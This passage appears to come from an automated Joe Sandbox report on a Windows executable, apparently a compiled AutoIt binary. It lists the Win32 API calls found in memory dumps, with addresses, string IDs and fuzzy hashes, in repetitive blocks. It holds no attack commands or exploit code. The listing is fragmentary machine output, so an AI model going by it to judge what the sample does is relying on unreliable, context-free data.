                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00BB393A
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BB3954
                                                                                                                                        • _wcslen.LIBCMT ref: 00BB3999
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BB39C6
                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BB39F4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                                        • String ID: SysListView32
                                                                                                                                        • API String ID: 2147712094-78025650
                                                                                                                                        • Opcode ID: bdeef60e1ad57ad9573aa9176ce9debe5cd2fc4d9dc1e9106fc17544bb26ac84
                                                                                                                                        • Instruction ID: ab9badc86333706df34851332cacbf6bb249a2fb6b35d51ecb14141f2a598e33
                                                                                                                                        • Opcode Fuzzy Hash: bdeef60e1ad57ad9573aa9176ce9debe5cd2fc4d9dc1e9106fc17544bb26ac84
                                                                                                                                        • Instruction Fuzzy Hash: AF41A471A00218ABEB21DF64CC45FFA7BE9EF08750F1005A6F559E7291D7B19A80CB90
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B8BCFD
                                                                                                                                        • IsMenu.USER32(00000000), ref: 00B8BD1D
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00B8BD53
                                                                                                                                        • GetMenuItemCount.USER32(01095928), ref: 00B8BDA4
                                                                                                                                        • InsertMenuItemW.USER32(01095928,?,00000001,00000030), ref: 00B8BDCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                        • String ID: 0$2
                                                                                                                                        • API String ID: 93392585-3793063076
                                                                                                                                        • Opcode ID: 281ef865c5d3865fb0a3761657714670ef7dff2bfefb2561d24b049893b73cad
                                                                                                                                        • Instruction ID: 7f99dc5b161edc0e5e095b70dd63342f64dbebb209aef3f44d19cea07708d722
                                                                                                                                        • Opcode Fuzzy Hash: 281ef865c5d3865fb0a3761657714670ef7dff2bfefb2561d24b049893b73cad
                                                                                                                                        • Instruction Fuzzy Hash: 08518C70A00205EBDB20EFB8D884FAEBBF4EF55314F1446A9E851A72B1D7709945CB61
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00B8C913
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoad
                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                                        • Opcode ID: 7109615072055ffbe91d1d2e544eab1e83acc308384442d7d180fb0c1a386d1d
                                                                                                                                        • Instruction ID: 5f88eee6c59d5b2321d524da1f94323d812e535d0b589d1d8ba9aa8f068e8007
                                                                                                                                        • Opcode Fuzzy Hash: 7109615072055ffbe91d1d2e544eab1e83acc308384442d7d180fb0c1a386d1d
                                                                                                                                        • Instruction Fuzzy Hash: F4110D71689706BAE702BB559C83DAA6BDCDF15364B2000FBF900A62E2E7B45E409375
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 642191829-3771769585
                                                                                                                                        • Opcode ID: abb9b259827141f6dad749b495aa497f437278b42f299b1ebd24f140cb9b7947
                                                                                                                                        • Instruction ID: 44992e8478ff234c85922c9a72429c186f7d3203c4bbeab0b599afc4ddb07a3d
                                                                                                                                        • Opcode Fuzzy Hash: abb9b259827141f6dad749b495aa497f437278b42f299b1ebd24f140cb9b7947
                                                                                                                                        • Instruction Fuzzy Hash: F011B471904115AFCF20BB649C4AEEE7BECDB15711F0001EAF5459B0A1EFB19A81DB60
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 952045576-0
                                                                                                                                        • Opcode ID: a021ea6e25884b587c8badfc52c5242746667bbe81ef6470bd40c8eef6a330fb
                                                                                                                                        • Instruction ID: b9bd335920afd8f0f4961e73ffc5a66538feaf6afb9202996b4cddef083115fd
                                                                                                                                        • Opcode Fuzzy Hash: a021ea6e25884b587c8badfc52c5242746667bbe81ef6470bd40c8eef6a330fb
                                                                                                                                        • Instruction Fuzzy Hash: 2341A065C1021876CB11FBB4C88AACFB7E8AF45310F5084A6E528F3121FB34E755D3A6
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B7682C,00000004,00000000,00000000), ref: 00B3F953
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B7682C,00000004,00000000,00000000), ref: 00B7F3D1
                                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B7682C,00000004,00000000,00000000), ref: 00B7F454
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                        • Opcode ID: 8b8b7bf3fd34fe526ab38c542e6908e112703e1e92036eb1f556a69db94e0e1d
                                                                                                                                        • Instruction ID: b7e30e5db4fb86f2c4eef7757338a3898098d4477d2dacc75f9ccf590e1cbf6c
                                                                                                                                        • Opcode Fuzzy Hash: 8b8b7bf3fd34fe526ab38c542e6908e112703e1e92036eb1f556a69db94e0e1d
                                                                                                                                        • Instruction Fuzzy Hash: 6541EB31D04642BBC7398B2D88C877A7BD2EB56324F3486FCE05B57660DA71E880C715
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00BB2D1B
                                                                                                                                        • GetDC.USER32(00000000), ref: 00BB2D23
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB2D2E
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00BB2D3A
                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BB2D76
                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BB2D87
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BB5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00BB2DC2
                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BB2DE1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                        • Opcode ID: 7a253d6cebfd6f7b229847bc2d729a26009e2f453e8de66b7a4aa077e1e889c1
                                                                                                                                        • Instruction ID: d2ffeb62cb0c445118db956426aea111e004096036855a4d1ad61ddbcee23048
                                                                                                                                        • Opcode Fuzzy Hash: 7a253d6cebfd6f7b229847bc2d729a26009e2f453e8de66b7a4aa077e1e889c1
                                                                                                                                        • Instruction Fuzzy Hash: 26315A72201214BBEB118F548C8AFFB3FA9EB49715F044165FE099B291CAB59C51CBA4
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        • Opcode ID: 80a99d5fe7339c24e059c5d02a565d45d2202f6cefbee1cc74984a8ce41a3408
                                                                                                                                        • Instruction ID: 3a3cc1d88eafed1d246820601e7ad47132985fc0d2a94a6dcecb982aa9e63b05
                                                                                                                                        • Opcode Fuzzy Hash: 80a99d5fe7339c24e059c5d02a565d45d2202f6cefbee1cc74984a8ce41a3408
                                                                                                                                        • Instruction Fuzzy Hash: 4F219561A50A0A77D6247D24CD82FFA23DCEE21394B4444E0FD049A5A1F761EE51D3A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                        • Opcode ID: c75f8e1b9e2e48cd1aa1af047769bf45da3352384e0995f87cafb120f716ce8d
                                                                                                                                        • Instruction ID: dcc35ebb0d6aeeb23db95955d0902d8aef2abc00e853088ec3fe4c4f2f3e04a5
                                                                                                                                        • Opcode Fuzzy Hash: c75f8e1b9e2e48cd1aa1af047769bf45da3352384e0995f87cafb120f716ce8d
                                                                                                                                        • Instruction Fuzzy Hash: 71D1A371A0460AAFDF20CFA8C881BAEB7F5FF49344F1484A9E915AB281D770DE45CB50
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(?,?), ref: 00B615CE
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B61651
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B616E4
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B616FB
                                                                                                                                          • Part of subcall function 00B53820: RtlAllocateHeap.NTDLL(00000000,?,00BF1444,?,00B3FDF5,?,?,00B2A976,00000010,00BF1440,00B213FC,?,00B213C6,?,00B21129), ref: 00B53852
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B61777
                                                                                                                                        • __freea.LIBCMT ref: 00B617A2
                                                                                                                                        • __freea.LIBCMT ref: 00B617AE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                        • Opcode ID: f9d722a63a76717387f2fbce301417b07add6061f1f1539b64845db5a47acf6a
                                                                                                                                        • Instruction ID: 063d04a5875e16602c4e38267e079280e5ceea6506f2711545c5e2a624a5282f
                                                                                                                                        • Opcode Fuzzy Hash: f9d722a63a76717387f2fbce301417b07add6061f1f1539b64845db5a47acf6a
                                                                                                                                        • Instruction Fuzzy Hash: 62919372E002169BDB208E78C891AFEBBF5EF59710F1C4A99E902E7151DB39DD44CB60
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                        • Opcode ID: a866228c31818172ba2c2df9172952c80b5f807fd87e94fc914eeecdca0cff70
                                                                                                                                        • Instruction ID: 4911b5ca4b8634266cb13c2fd3eeb79eb1fafb750b913269636d9ca58898637d
                                                                                                                                        • Opcode Fuzzy Hash: a866228c31818172ba2c2df9172952c80b5f807fd87e94fc914eeecdca0cff70
                                                                                                                                        • Instruction Fuzzy Hash: AA919071A04215ABDF20CFA5D884FAEBBF8EF86710F108599F505AB281D7B09D45CFA0
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00B9125C
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B91284
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00B912A8
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B912D8
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B9135F
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B913C4
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00B91430
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                        • Opcode ID: 1f87830b46bdd782debea53e2911e7a7d24ba92e749c99ea3fbf9296dd6d7e51
                                                                                                                                        • Instruction ID: 9efd7605d794ec9e390af70a134a1d7a9482886f787ae2e63178ab0f429ecd6e
                                                                                                                                        • Opcode Fuzzy Hash: 1f87830b46bdd782debea53e2911e7a7d24ba92e749c99ea3fbf9296dd6d7e51
                                                                                                                                        • Instruction Fuzzy Hash: 9D919D75A0021AAFDB009F98D885BBE77F5FF48314F1188A9E500EB391D774A941DB90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                        • Opcode ID: 742a9412f625b9effe81944f5c9b7fddd80d1206dd50e498f1105c6c802acdc0
                                                                                                                                        • Instruction ID: 2e05c67af5e8190950c094e7958d7437931a7fd49cc8df3539e787a6277af584
                                                                                                                                        • Opcode Fuzzy Hash: 742a9412f625b9effe81944f5c9b7fddd80d1206dd50e498f1105c6c802acdc0
                                                                                                                                        • Instruction Fuzzy Hash: BA912671D40219EFCB10CFA9C885AEEBBB8FF49320F258195E515B7251D7B4A982CB60
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00BA396B
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BA3A7A
                                                                                                                                        • _wcslen.LIBCMT ref: 00BA3A8A
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00BA3C1F
                                                                                                                                          • Part of subcall function 00B90CDF: VariantInit.OLEAUT32(00000000), ref: 00B90D1F
                                                                                                                                          • Part of subcall function 00B90CDF: VariantCopy.OLEAUT32(?,?), ref: 00B90D28
                                                                                                                                          • Part of subcall function 00B90CDF: VariantClear.OLEAUT32(?), ref: 00B90D34
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                        • Opcode ID: 767e186d80dbfa5738f181a8d839b4db72ca36a8e923c9abf31ae205c2810581
                                                                                                                                        • Instruction ID: 261f0ceb342d07a43d2d1e0d4276272eec669ebc90bbcc3695e27d9e83431394
                                                                                                                                        • Opcode Fuzzy Hash: 767e186d80dbfa5738f181a8d839b4db72ca36a8e923c9abf31ae205c2810581
                                                                                                                                        • Instruction Fuzzy Hash: D9916B756083059FC704EF28C48096AB7E5FF89714F1489AEF88A9B351DB30EE45CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B8000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?,?,00B8035E), ref: 00B8002B
                                                                                                                                          • Part of subcall function 00B8000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?), ref: 00B80046
                                                                                                                                          • Part of subcall function 00B8000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?), ref: 00B80054
                                                                                                                                          • Part of subcall function 00B8000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?), ref: 00B80064
                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00BA4C51
                                                                                                                                        • _wcslen.LIBCMT ref: 00BA4D59
                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00BA4DCF
                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00BA4DDA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
